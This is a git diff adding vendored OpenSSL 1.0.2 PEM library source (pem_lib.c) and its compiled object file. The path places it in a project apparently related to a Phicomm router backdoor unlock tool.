+    /* Permit older strings */
+
+    if (!strcmp(nm, PEM_STRING_X509_OLD) && !strcmp(name, PEM_STRING_X509))
+        return 1;
+
+    if (!strcmp(nm, PEM_STRING_X509_REQ_OLD) &&
+        !strcmp(name, PEM_STRING_X509_REQ))
+        return 1;
+
+    /* Allow normal certs to be read as trusted certs */
+    if (!strcmp(nm, PEM_STRING_X509) &&
+        !strcmp(name, PEM_STRING_X509_TRUSTED))
+        return 1;
+
+    if (!strcmp(nm, PEM_STRING_X509_OLD) &&
+        !strcmp(name, PEM_STRING_X509_TRUSTED))
+        return 1;
+
+    /* Some CAs use PKCS#7 with CERTIFICATE headers */
+    if (!strcmp(nm, PEM_STRING_X509) && !strcmp(name, PEM_STRING_PKCS7))
+        return 1;
+
+    if (!strcmp(nm, PEM_STRING_PKCS7_SIGNED) &&
+        !strcmp(name, PEM_STRING_PKCS7))
+        return 1;
+
+#ifndef OPENSSL_NO_CMS
+    if (!strcmp(nm, PEM_STRING_X509) && !strcmp(name, PEM_STRING_CMS))
+        return 1;
+    /* Allow CMS to be read from PKCS#7 headers */
+    if (!strcmp(nm, PEM_STRING_PKCS7) && !strcmp(name, PEM_STRING_CMS))
+        return 1;
+#endif
+
+    return 0;
+}
+
+int PEM_bytes_read_bio(unsigned char **pdata, long *plen, char **pnm,
+                       const char *name, BIO *bp, pem_password_cb *cb,
+                       void *u)
+{
+    EVP_CIPHER_INFO cipher;
+    char *nm = NULL, *header = NULL;
+    unsigned char *data = NULL;
+    long len;
+    int ret = 0;
+
+    for (;;) {
+        if (!PEM_read_bio(bp, &nm, &header, &data, &len)) {
+            if (ERR_GET_REASON(ERR_peek_error()) == PEM_R_NO_START_LINE)
+                ERR_add_error_data(2, "Expecting: ", name);
+            return 0;
+        }
+        if (check_pem(nm, name))
+            break;
+        OPENSSL_free(nm);
+        OPENSSL_free(header);
+        OPENSSL_free(data);
+    }
+    if (!PEM_get_EVP_CIPHER_INFO(header, &cipher))
+        goto err;
+    if (!PEM_do_header(&cipher, data, &len, cb, u))
+        goto err;
+
+    *pdata = data;
+    *plen = len;
+
+    if (pnm)
+        *pnm = nm;
+
+    ret = 1;
+
+ err:
+    if (!ret || !pnm)
+        OPENSSL_free(nm);
+    OPENSSL_free(header);
+    if (!ret)
+        OPENSSL_free(data);
+    return ret;
+}
+
+#ifndef OPENSSL_NO_FP_API
+int PEM_ASN1_write(i2d_of_void *i2d, const char *name, FILE *fp,
+                   void *x, const EVP_CIPHER *enc, unsigned char *kstr,
+                   int klen, pem_password_cb *callback, void *u)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_ASN1_WRITE, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_ASN1_write_bio(i2d, name, b, x, enc, kstr, klen, callback, u);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int PEM_ASN1_write_bio(i2d_of_void *i2d, const char *name, BIO *bp,
+                       void *x, const EVP_CIPHER *enc, unsigned char *kstr,
+                       int klen, pem_password_cb *callback, void *u)
+{
+    EVP_CIPHER_CTX ctx;
+    int dsize = 0, i, j, ret = 0;
+    unsigned char *p, *data = NULL;
+    const char *objstr = NULL;
+    char buf[PEM_BUFSIZE];
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+
+    if (enc != NULL) {
+        objstr = OBJ_nid2sn(EVP_CIPHER_nid(enc));
+        if (objstr == NULL) {
+            PEMerr(PEM_F_PEM_ASN1_WRITE_BIO, PEM_R_UNSUPPORTED_CIPHER);
+            goto err;
+        }
+    }
+
+    if ((dsize = i2d(x, NULL)) < 0) {
+        PEMerr(PEM_F_PEM_ASN1_WRITE_BIO, ERR_R_ASN1_LIB);
+        dsize = 0;
+        goto err;
+    }
+    /* dzise + 8 bytes are needed */
+    /* actually it needs the cipher block size extra... */
+    data = (unsigned char *)OPENSSL_malloc((unsigned int)dsize + 20);
+    if (data == NULL) {
+        PEMerr(PEM_F_PEM_ASN1_WRITE_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = data;
+    i = i2d(x, &p);
+
+    if (enc != NULL) {
+        if (kstr == NULL) {
+            if (callback == NULL)
+                klen = PEM_def_callback(buf, PEM_BUFSIZE, 1, u);
+            else
+                klen = (*callback) (buf, PEM_BUFSIZE, 1, u);
+            if (klen <= 0) {
+                PEMerr(PEM_F_PEM_ASN1_WRITE_BIO, PEM_R_READ_KEY);
+                goto err;
+            }
+#ifdef CHARSET_EBCDIC
+            /* Convert the pass phrase from EBCDIC */
+            ebcdic2ascii(buf, buf, klen);
+#endif
+            kstr = (unsigned char *)buf;
+        }
+        RAND_add(data, i, 0);   /* put in the RSA key. */
+        OPENSSL_assert(enc->iv_len <= (int)sizeof(iv));
+        if (RAND_pseudo_bytes(iv, enc->iv_len) < 0) /* Generate a salt */
+            goto err;
+        /*
+         * The 'iv' is used as the iv and as a salt.  It is NOT taken from
+         * the BytesToKey function
+         */
+        if (!EVP_BytesToKey(enc, EVP_md5(), iv, kstr, klen, 1, key, NULL))
+            goto err;
+
+        if (kstr == (unsigned char *)buf)
+            OPENSSL_cleanse(buf, PEM_BUFSIZE);
+
+        OPENSSL_assert(strlen(objstr) + 23 + 2 * enc->iv_len + 13 <=
+                       sizeof buf);
+
+        buf[0] = '\0';
+        PEM_proc_type(buf, PEM_TYPE_ENCRYPTED);
+        PEM_dek_info(buf, objstr, enc->iv_len, (char *)iv);
+        /* k=strlen(buf); */
+
+        EVP_CIPHER_CTX_init(&ctx);
+        ret = 1;
+        if (!EVP_EncryptInit_ex(&ctx, enc, NULL, key, iv)
+            || !EVP_EncryptUpdate(&ctx, data, &j, data, i)
+            || !EVP_EncryptFinal_ex(&ctx, &(data[j]), &i))
+            ret = 0;
+        EVP_CIPHER_CTX_cleanup(&ctx);
+        if (ret == 0)
+            goto err;
+        i += j;
+    } else {
+        ret = 1;
+        buf[0] = '\0';
+    }
+    i = PEM_write_bio(bp, name, buf, data, i);
+    if (i <= 0)
+        ret = 0;
+ err:
+    OPENSSL_cleanse(key, sizeof(key));
+    OPENSSL_cleanse(iv, sizeof(iv));
+    OPENSSL_cleanse((char *)&ctx, sizeof(ctx));
+    OPENSSL_cleanse(buf, PEM_BUFSIZE);
+    if (data != NULL) {
+        OPENSSL_cleanse(data, (unsigned int)dsize);
+        OPENSSL_free(data);
+    }
+    return (ret);
+}
+
+int PEM_do_header(EVP_CIPHER_INFO *cipher, unsigned char *data, long *plen,
+                  pem_password_cb *callback, void *u)
+{
+    int i = 0, j, o, klen;
+    long len;
+    EVP_CIPHER_CTX ctx;
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    char buf[PEM_BUFSIZE];
+
+    len = *plen;
+
+    if (cipher->cipher == NULL)
+        return (1);
+    if (callback == NULL)
+        klen = PEM_def_callback(buf, PEM_BUFSIZE, 0, u);
+    else
+        klen = callback(buf, PEM_BUFSIZE, 0, u);
+    if (klen <= 0) {
+        PEMerr(PEM_F_PEM_DO_HEADER, PEM_R_BAD_PASSWORD_READ);
+        return (0);
+    }
+#ifdef CHARSET_EBCDIC
+    /* Convert the pass phrase from EBCDIC */
+    ebcdic2ascii(buf, buf, klen);
+#endif
+
+    if (!EVP_BytesToKey(cipher->cipher, EVP_md5(), &(cipher->iv[0]),
+                        (unsigned char *)buf, klen, 1, key, NULL))
+        return 0;
+
+    j = (int)len;
+    EVP_CIPHER_CTX_init(&ctx);
+    o = EVP_DecryptInit_ex(&ctx, cipher->cipher, NULL, key, &(cipher->iv[0]));
+    if (o)
+        o = EVP_DecryptUpdate(&ctx, data, &i, data, j);
+    if (o)
+        o = EVP_DecryptFinal_ex(&ctx, &(data[i]), &j);
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    OPENSSL_cleanse((char *)buf, sizeof(buf));
+    OPENSSL_cleanse((char *)key, sizeof(key));
+    if (o)
+        j += i;
+    else {
+        PEMerr(PEM_F_PEM_DO_HEADER, PEM_R_BAD_DECRYPT);
+        return (0);
+    }
+    *plen = j;
+    return (1);
+}
+
+int PEM_get_EVP_CIPHER_INFO(char *header, EVP_CIPHER_INFO *cipher)
+{
+    const EVP_CIPHER *enc = NULL;
+    char *p, c;
+    char **header_pp = &header;
+
+    cipher->cipher = NULL;
+    if ((header == NULL) || (*header == '\0') || (*header == '\n'))
+        return (1);
+    if (strncmp(header, "Proc-Type: ", 11) != 0) {
+        PEMerr(PEM_F_PEM_GET_EVP_CIPHER_INFO, PEM_R_NOT_PROC_TYPE);
+        return (0);
+    }
+    header += 11;
+    if (*header != '4')
+        return (0);
+    header++;
+    if (*header != ',')
+        return (0);
+    header++;
+    if (strncmp(header, "ENCRYPTED", 9) != 0) {
+        PEMerr(PEM_F_PEM_GET_EVP_CIPHER_INFO, PEM_R_NOT_ENCRYPTED);
+        return (0);
+    }
+    for (; (*header != '\n') && (*header != '\0'); header++) ;
+    if (*header == '\0') {
+        PEMerr(PEM_F_PEM_GET_EVP_CIPHER_INFO, PEM_R_SHORT_HEADER);
+        return (0);
+    }
+    header++;
+    if (strncmp(header, "DEK-Info: ", 10) != 0) {
+        PEMerr(PEM_F_PEM_GET_EVP_CIPHER_INFO, PEM_R_NOT_DEK_INFO);
+        return (0);
+    }
+    header += 10;
+
+    p = header;
+    for (;;) {
+        c = *header;
+#ifndef CHARSET_EBCDIC
+        if (!(((c >= 'A') && (c <= 'Z')) || (c == '-') ||
+              ((c >= '0') && (c <= '9'))))
+            break;
+#else
+        if (!(isupper(c) || (c == '-') || isdigit(c)))
+            break;
+#endif
+        header++;
+    }
+    *header = '\0';
+    cipher->cipher = enc = EVP_get_cipherbyname(p);
+    *header = c;
+    header++;
+
+    if (enc == NULL) {
+        PEMerr(PEM_F_PEM_GET_EVP_CIPHER_INFO, PEM_R_UNSUPPORTED_ENCRYPTION);
+        return (0);
+    }
+    if (!load_iv(header_pp, &(cipher->iv[0]), enc->iv_len))
+        return (0);
+
+    return (1);
+}
+
+static int load_iv(char **fromp, unsigned char *to, int num)
+{
+    int v, i;
+    char *from;
+
+    from = *fromp;
+    for (i = 0; i < num; i++)
+        to[i] = 0;
+    num *= 2;
+    for (i = 0; i < num; i++) {
+        if ((*from >= '0') && (*from <= '9'))
+            v = *from - '0';
+        else if ((*from >= 'A') && (*from <= 'F'))
+            v = *from - 'A' + 10;
+        else if ((*from >= 'a') && (*from <= 'f'))
+            v = *from - 'a' + 10;
+        else {
+            PEMerr(PEM_F_LOAD_IV, PEM_R_BAD_IV_CHARS);
+            return (0);
+        }
+        from++;
+        to[i / 2] |= v << (long)((!(i & 1)) * 4);
+    }
+
+    *fromp = from;
+    return (1);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int PEM_write(FILE *fp, const char *name, const char *header,
+              const unsigned char *data, long len)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_WRITE, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_write_bio(b, name, header, data, len);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int PEM_write_bio(BIO *bp, const char *name, const char *header,
+                  const unsigned char *data, long len)
+{
+    int nlen, n, i, j, outl;
+    unsigned char *buf = NULL;
+    EVP_ENCODE_CTX ctx;
+    int reason = ERR_R_BUF_LIB;
+
+    EVP_EncodeInit(&ctx);
+    nlen = strlen(name);
+
+    if ((BIO_write(bp, "-----BEGIN ", 11) != 11) ||
+        (BIO_write(bp, name, nlen) != nlen) ||
+        (BIO_write(bp, "-----\n", 6) != 6))
+        goto err;
+
+    i = strlen(header);
+    if (i > 0) {
+        if ((BIO_write(bp, header, i) != i) || (BIO_write(bp, "\n", 1) != 1))
+            goto err;
+    }
+
+    buf = OPENSSL_malloc(PEM_BUFSIZE * 8);
+    if (buf == NULL) {
+        reason = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+
+    i = j = 0;
+    while (len > 0) {
+        n = (int)((len > (PEM_BUFSIZE * 5)) ? (PEM_BUFSIZE * 5) : len);
+        EVP_EncodeUpdate(&ctx, buf, &outl, &(data[j]), n);
+        if ((outl) && (BIO_write(bp, (char *)buf, outl) != outl))
+            goto err;
+        i += outl;
+        len -= n;
+        j += n;
+    }
+    EVP_EncodeFinal(&ctx, buf, &outl);
+    if ((outl > 0) && (BIO_write(bp, (char *)buf, outl) != outl))
+        goto err;
+    OPENSSL_cleanse(buf, PEM_BUFSIZE * 8);
+    OPENSSL_free(buf);
+    buf = NULL;
+    if ((BIO_write(bp, "-----END ", 9) != 9) ||
+        (BIO_write(bp, name, nlen) != nlen) ||
+        (BIO_write(bp, "-----\n", 6) != 6))
+        goto err;
+    return (i + outl);
+ err:
+    if (buf) {
+        OPENSSL_cleanse(buf, PEM_BUFSIZE * 8);
+        OPENSSL_free(buf);
+    }
+    PEMerr(PEM_F_PEM_WRITE_BIO, reason);
+    return (0);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int PEM_read(FILE *fp, char **name, char **header, unsigned char **data,
+             long *len)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_READ, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_read_bio(b, name, header, data, len);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int PEM_read_bio(BIO *bp, char **name, char **header, unsigned char **data,
+                 long *len)
+{
+    EVP_ENCODE_CTX ctx;
+    int end = 0, i, k, bl = 0, hl = 0, nohead = 0;
+    char buf[256];
+    BUF_MEM *nameB;
+    BUF_MEM *headerB;
+    BUF_MEM *dataB, *tmpB;
+
+    nameB = BUF_MEM_new();
+    headerB = BUF_MEM_new();
+    dataB = BUF_MEM_new();
+    if ((nameB == NULL) || (headerB == NULL) || (dataB == NULL)) {
+        BUF_MEM_free(nameB);
+        BUF_MEM_free(headerB);
+        BUF_MEM_free(dataB);
+        PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+
+    buf[254] = '\0';
+    for (;;) {
+        i = BIO_gets(bp, buf, 254);
+
+        if (i <= 0) {
+            PEMerr(PEM_F_PEM_READ_BIO, PEM_R_NO_START_LINE);
+            goto err;
+        }
+
+        while ((i >= 0) && (buf[i] <= ' '))
+            i--;
+        buf[++i] = '\n';
+        buf[++i] = '\0';
+
+        if (strncmp(buf, "-----BEGIN ", 11) == 0) {
+            i = strlen(&(buf[11]));
+
+            if (strncmp(&(buf[11 + i - 6]), "-----\n", 6) != 0)
+                continue;
+            if (!BUF_MEM_grow(nameB, i + 9)) {
+                PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            memcpy(nameB->data, &(buf[11]), i - 6);
+            nameB->data[i - 6] = '\0';
+            break;
+        }
+    }
+    hl = 0;
+    if (!BUF_MEM_grow(headerB, 256)) {
+        PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    headerB->data[0] = '\0';
+    for (;;) {
+        i = BIO_gets(bp, buf, 254);
+        if (i <= 0)
+            break;
+
+        while ((i >= 0) && (buf[i] <= ' '))
+            i--;
+        buf[++i] = '\n';
+        buf[++i] = '\0';
+
+        if (buf[0] == '\n')
+            break;
+        if (!BUF_MEM_grow(headerB, hl + i + 9)) {
+            PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (strncmp(buf, "-----END ", 9) == 0) {
+            nohead = 1;
+            break;
+        }
+        memcpy(&(headerB->data[hl]), buf, i);
+        headerB->data[hl + i] = '\0';
+        hl += i;
+    }
+
+    bl = 0;
+    if (!BUF_MEM_grow(dataB, 1024)) {
+        PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    dataB->data[0] = '\0';
+    if (!nohead) {
+        for (;;) {
+            i = BIO_gets(bp, buf, 254);
+            if (i <= 0)
+                break;
+
+            while ((i >= 0) && (buf[i] <= ' '))
+                i--;
+            buf[++i] = '\n';
+            buf[++i] = '\0';
+
+            if (i != 65)
+                end = 1;
+            if (strncmp(buf, "-----END ", 9) == 0)
+                break;
+            if (i > 65)
+                break;
+            if (!BUF_MEM_grow_clean(dataB, i + bl + 9)) {
+                PEMerr(PEM_F_PEM_READ_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            memcpy(&(dataB->data[bl]), buf, i);
+            dataB->data[bl + i] = '\0';
+            bl += i;
+            if (end) {
+                buf[0] = '\0';
+                i = BIO_gets(bp, buf, 254);
+                if (i <= 0)
+                    break;
+
+                while ((i >= 0) && (buf[i] <= ' '))
+                    i--;
+                buf[++i] = '\n';
+                buf[++i] = '\0';
+
+                break;
+            }
+        }
+    } else {
+        tmpB = headerB;
+        headerB = dataB;
+        dataB = tmpB;
+        bl = hl;
+    }
+    i = strlen(nameB->data);
+    if ((strncmp(buf, "-----END ", 9) != 0) ||
+        (strncmp(nameB->data, &(buf[9]), i) != 0) ||
+        (strncmp(&(buf[9 + i]), "-----\n", 6) != 0)) {
+        PEMerr(PEM_F_PEM_READ_BIO, PEM_R_BAD_END_LINE);
+        goto err;
+    }
+
+    EVP_DecodeInit(&ctx);
+    i = EVP_DecodeUpdate(&ctx,
+                         (unsigned char *)dataB->data, &bl,
+                         (unsigned char *)dataB->data, bl);
+    if (i < 0) {
+        PEMerr(PEM_F_PEM_READ_BIO, PEM_R_BAD_BASE64_DECODE);
+        goto err;
+    }
+    i = EVP_DecodeFinal(&ctx, (unsigned char *)&(dataB->data[bl]), &k);
+    if (i < 0) {
+        PEMerr(PEM_F_PEM_READ_BIO, PEM_R_BAD_BASE64_DECODE);
+        goto err;
+    }
+    bl += k;
+
+    if (bl == 0)
+        goto err;
+    *name = nameB->data;
+    *header = headerB->data;
+    *data = (unsigned char *)dataB->data;
+    *len = bl;
+    OPENSSL_free(nameB);
+    OPENSSL_free(headerB);
+    OPENSSL_free(dataB);
+    return (1);
+ err:
+    BUF_MEM_free(nameB);
+    BUF_MEM_free(headerB);
+    BUF_MEM_free(dataB);
+    return (0);
+}
+
+/*
+ * Check pem string and return prefix length. If for example the pem_str ==
+ * "RSA PRIVATE KEY" and suffix = "PRIVATE KEY" the return value is 3 for the
+ * string "RSA".
+ */
+
+int pem_check_suffix(const char *pem_str, const char *suffix)
+{
+    int pem_len = strlen(pem_str);
+    int suffix_len = strlen(suffix);
+    const char *p;
+    if (suffix_len + 1 >= pem_len)
+        return 0;
+    p = pem_str + pem_len - suffix_len;
+    if (strcmp(p, suffix))
+        return 0;
+    p--;
+    if (*p != ' ')
+        return 0;
+    return p - pem_str;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..0a587a60da426d7eaeec9a6f5bb364e78fdd8304
GIT binary patch
literal 18448
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
